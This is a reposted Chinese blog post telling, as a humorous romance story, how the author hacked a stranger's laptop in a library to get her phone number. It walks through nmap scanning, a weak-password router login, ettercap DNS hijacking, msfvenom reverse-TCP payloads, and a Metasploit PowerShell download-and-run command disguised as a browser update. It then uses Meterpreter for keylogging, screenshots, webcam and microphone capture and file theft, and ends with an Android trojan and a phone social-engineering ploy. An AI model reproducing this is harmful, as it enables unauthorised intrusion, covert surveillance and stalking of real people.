图书馆撩妹记 | 转载

  • 2018-09-16
  • 442
  • 2

本文由【网站建设制作技术交流】群(7717114)]Yeshisan 大佬所著. 以下为原文内容:


起因

有一位偉人曾經說過:人不可能無緣無故去幹一件事情,其背後肯定有更深層次的原因。
簡單交代下起因:圖書館遇到一個妹子,長得很漂亮,想要聯繫方式,但是不好意思上去問。

那麼作爲一個死宅,和高手一樣上去撩那肯定是不存在的,那么我就想着能不能通过某些方式去获取她的联系方式。

首先我們來做個簡單的分析,由於圖書館就處在幾個學校附近,而且這個妹子還帶了電腦。那麼按照正常思維來考慮,這個妹子會不會是附近學校的學生,如果是學生,那麼筆記本電腦內是不是可能存在報名表這一類的信息。如果有,那麼這類文件裏面是不是有手機號碼,郵箱之類的信息???

這是一個賭博性的行爲,不過如果我要是猜錯了,在我控制了她的電腦的情況下,我還是有方法能獲取到想要的信息。

那麼我們的切入點就從電腦開始。

作爲一個老司機,通過多年的猥瑣經驗,我能確定這個妹子就是附近學校的學生(不要問我怎麼知道的)

思路

既然明確了方向,那麼問題就來了,如何去控制妹子的電腦?

因爲個人電腦不像服務器之類的設備擁有固定的IP地址,即使有固定的IP地址,在全球無數的IP中找出來,那幾乎是不可能的事情。但是圖書館開放了免費的WIFI服務,那麼我們是不是可以和妹子鏈接到一樣的wifi,處於同一網段下在掃描網段內存活的IP地址進行判斷,得出妹子的內網IP地址,掃描端口服務進行搞事。

那麼連上WIFI以後,先來看一下當前DHCP給我們分配的IP地址:

Root@promote:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet)
RX packets 34 bytes 2820 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 3407 (3.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

當前的IP地址是:192.168.1.123,如果默認的地址沒有修改的話,那麼網關應該就是:192.168.1.1了,也就是路由器的地址。
一般網段的數值是0/255,所以我們要探測一下0-255這個數值中存活的IP地址。

root@promote:~# nmap -sP 192.168.1.0/24

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:35 CST
Nmap scan report for bogon (192.168.1.1)
Host is up (0.0012s latency).
MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00019s latency).
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Nmap scan report for bogon (192.168.1.103)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

由於這是我搭建復現的環境,通過NMAP探測存活的IP只有103和106兩個地址,實際情況存活的IP比這個要略多。那麼怎麼去判斷路由器分配給妹子的是哪個地址呢?

由於當時比較特殊,帶筆記本的就我們兩個,而其他人都是android或者是IOS的手機,加上前臺的電腦,一共也就三個,所以窺屏是最有效的方法。

此時,一位不願意透露姓名的帥哥悄然路過,並看了一下你的屏幕。

最後的結果:

我 = Kali linux 妹子 = WIN7 前臺電腦 = win10

也就是說只要哪個IP的操作系統是7,那麼就是妹子的電腦。再次掏出神器NMAP進行系統探測。

root@promote:~# nmap -O 192.168.1.106

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:37 CST
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
902/tcp open  iss-realsecure
912/tcp open  apex-mesh
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at [url]https://nmap.org/submit/[/url] .
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

那麼最後的檢測結果是106這個IP地址,在使用NMAP進行探測的時候,順帶把操作系統的端口服務探測出來了。第一反應就是拿exp對可能存在漏洞的服務,如果能進去那就省事了,但是想法很美好,現實很殘酷。無果。。。。

跑廁所抽了根菸,既然主動出擊不行,那麼我是不是可以走迂迴路線,通過DNS劫持強行轉條到我的電腦上,同步開發apache服務,生成一個木馬誘導妹子去下載,然後反鏈到我的電腦上建立一個隧道來控制目標電腦。

但目前市面上大多數的路由器都帶有arp或者DNS攻擊的防禦,爲了避免這個問題,我得先把路由器的防禦機制關閉,打開路由的默認地址,弱口令一竅,進去了…..(天選之人,老天都想幫我)

在開始劫持之前我需要先來生成一個木馬,這裏我打算用metasploit來搞這個木馬,畢竟kali linux,怎麼簡單怎麼來。
原理比較簡單,通過Reverse tcp生成一個木馬進行監聽,當目標機器運行這個木馬之後,木馬會向預設的IP地址和端口發起一個tcp的請求,kali監聽到端口有請求之後,會建立一個meterpreter的會話。

一些介紹:

  • msfvenom 取代了之前的msfpayload和msfencode
  • p參數指定加載的payload,这里用到的是reverse_tcp反连模块
  • LHOST:设置反连的IP地址,也就是本机
  • LPORT: 设置反连的端口,默认是4444端口
  • f参数:输出为exe木马,可指定输出木马,默认生成在root目录下

官方介紹:

Reverse TCP
The reverse TCP handler is provided by the Msf::Handler::ReverseTcp class. It will listen on a port for incoming connections and will make a call into handle connection with the client sockets as they do.

由於是windows的系統,所以我打算生成一個exe格式的:

root@book:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

启动metasploit进行监听。
msf > use exploit/multi/handler //载入模块
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //载入payload,与生成木马的payload一致
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options //查看需要设置的选项

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123 //设置监听IP地址
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444 //设置监听端口
LPORT => 4444
msf exploit(handler) > run //开始监听

Started reverse TCP handler on 192.168.1.123:4444
Starting the payload handler...
Sending stage (1189423 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800
Sending stage (1189423 bytes) to 192.168.1.106
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

接下來就是劫持了,首先的話需要修改一下etter.dns這個文件

Vim /etc/ettercap/etter.dns

* 号是通配符,表示所有域名

- A和PTR後之指向的地址

由於使用的是通配符,也就是當劫持開起後,無論妹子訪問任何網址最後都會轉條到我的電腦上,同步的,我們在電腦上開起apache服務,並把木馬移動到網站根目錄下,修改首頁文件,彈出木馬下載。

~$ Service apache2 start // 啓動apache服務
~$ cp test.exe /var/www/html //移動到根目錄

然後啓動ettercap進行劫持,如果你不懂的話,可以看這篇。

https://blog.csdn.net/hy_696/article/details/74640519

小提示:可以写一个html网页进行伪装,比如弹出浏览器版本过低请安装最新版本重新访问之类的话语,然后弹出下载地址。

在漫長的等待後,msf依舊沒收到來自目標的請求.
我又去窺了一下屏,在屏幕右下角看到了數字的logo.
這就很尷尬了,由於我的木馬是沒有做免殺的,那就是被幹掉了.

這裏,我需要再搞一個能過殺軟的木馬,打算用powershell來做這件事情,powershell由於一些原因並不會被殺軟查殺,但在實際掃描中數字還是會報毒,但是在執行的時候並沒有被攔截。關於powershell的一些介紹可以google一下。

msf > use exploit/multi/script/web_delivery //载入模块
msf exploit(web_delivery) > info //查看需要设置的选项

Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19

Provided by:
Andrew Smith "jakx" <[email]jakx.ppr@gmail.com[/email]>
Ben Campbell <[email]eat_meatballs@hotmail.co.uk[/email]>
Chris Campbell

Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module quickly fires up a web server that serves a payload. The
provided command will start the specified scripting language
interpreter and then download and execute the payload. The main
purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command
himself, e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Exec. This attack vector does not write to disk so it
is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64
machines.

References:
[url]http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html[/url]
[url]http://www.pentestgeek.com/2013/07/19/invoke-shellcode/[/url]
[url]http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/[/url]
[url]http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html[/url]

msf exploit(web_delivery) > set URIPATH / 设置为根路径
URIPATH => /
msf exploit(web_delivery) > set target 2 //设置保存文件的类型,这里是PSH
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payload
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options //查看设置选项

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > set LHOST 192.168.1.123 //设置反连IP
LHOST => 192.168.1.123
msf exploit(web_delivery) > set LPORT 4444 //设置反连端口
LPORT => 4444
msf exploit(web_delivery) > run //配置好选项直接run,msf会自动生成一端pwoershell的代码
Exploit running as background job.
Started reverse TCP handler on 192.168.1.123:4444
Using URL: [url]http://0.0.0.0:8080/[/url]
Local IP: [url]http://192.168.1.123:8080/[/url]
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();

這裏生成的是一段powershell的代碼,把這段代碼複製然後保存成bat文件,移動到根目錄下。

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$

這裏的話,如願以償的獲取到了一個meterpreter的會話。

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering Payload
Sending stage (957487 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800
sessions 1
Starting interaction with 1...

meterpreter >

有了這個會話後我們就可以幹很多事情了,比如搜索電腦上的某些文件,這些文件裏面可能就存在聯繫方式。

如果你不是很熟悉Meterpreter,可以通过help命令获取帮助

Meterpreter常用命令
  • help:查看帮助信息
  • background:将会话放置后台,退回Msfdownload:从目标主机上下载文件
  • upload:上传文件到目标机
  • execute:在入侵主机上执行命令
  • shell:在入侵主机上(仅是Windows主机)运行Windows shell命令
  • session -i:切换会话

鍵盤記錄:keyscan_start

開起鍵盤記錄看看妹子在寫什麼東西

meterpreter > keyscan_start
Starting the keystroke sniffer...

下載鍵盤記錄,可以看到我寫的是meizi i love you

meterpreter > keyscan_dump
Dumping captured keystrokes...
meizi l <Back> i love you

停止鍵盤記錄:keyscan_stop

開起攝像頭截取一張妹子的正面照

列出攝像頭列表:webcam_list
從攝像頭截取一張照片:webcam_snap
麥克風錄音:record_mic

這個攝像頭和錄音就不談了,如果是手機,這兩個結合起來搞不好可以來個爲愛鼓掌現場直播。當然這功能我基本沒用過.

想看妹子現在在幹嗎,可以截取電腦的屏幕或者……

meterpreter > screenshot
Screenshot saved to: /root/ThWrdjpy.jpeg
meterpreter >

當然我們最初的目標,就是搜索妹子電腦的文件看能不能找到聯繫方式。

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

    -d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
    -f <opt>  The file pattern glob to search for. (e.g. *secret*.doc?)
    -h        Help Banner.
    -r <opt>  Recursivly search sub directories. (Default: true)

meterpreter >

比如我想要搜索txt文件

通過查看文件名,下載可能存在的文件。

meterpreter > download -r c:/1.txt
[*] downloading: c:/1.txt -> 1.txt
[*] downloaded : c:/1.txt -> 1.txt

如願以償,在某個word文件中找到了妹子的手機號碼和郵箱,通過wechat搜索手機號,對比頭像,確認過眼神,你就是本人。

然而你以爲這樣就完了嗎?

雖然通過電腦上的文件獲取到了一些信息,但是如果我們能把手機也搞了那是不是可以玩更好玩的。

然,通過內網成功的搞定了妹子的電腦,但是如果妹子離開了圖書館,那麼我們的木馬就失效了,所以這裏我們需要通過公網再生產一個木馬,上傳到目標機器上,達到長久控制的效果。關於PC端的參考上面。這裏我再整個安卓的木馬,免殺的過程我就不說了。。。

root@book:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Error: The following options failed to validate: LPORT.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > run

[-] Handler failed to bind to 192.168.1.123:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...

如何把木馬弄到妹子的手機呢?考驗演技的時候到了。

拿起我的手機假裝打電話,隨便找個人什麼被車撞了……(隨便編),請注意控制你說話的音量,儘可能不要太大聲又能讓妹子聽見。突然手機沒電,然後找妹子借電話。

其實這裏還有一段通過前面弄到的照片,寫了一個網頁….

在妹子的好心勸說(威脅)下,此處把照片都刪了。

最後
儘管我的演技很爛,但是妹子還是很有同情心的。

處於好玩和無聊,並無任何非分之想,事後我跟妹子說了整件事的過程。並得到了妹子的諒解(才怪)。

一波沒有含量的套路,收穫了一個美女朋友,不虧。

本文转自: 我的邻居 叶落无声

原文链接: http://y13.fun/tushuguan/

评论

  • 匿名回复

    这位兄dei非法撩妹啊这是

    • 燕归来回复

      大佬般的存在,仰望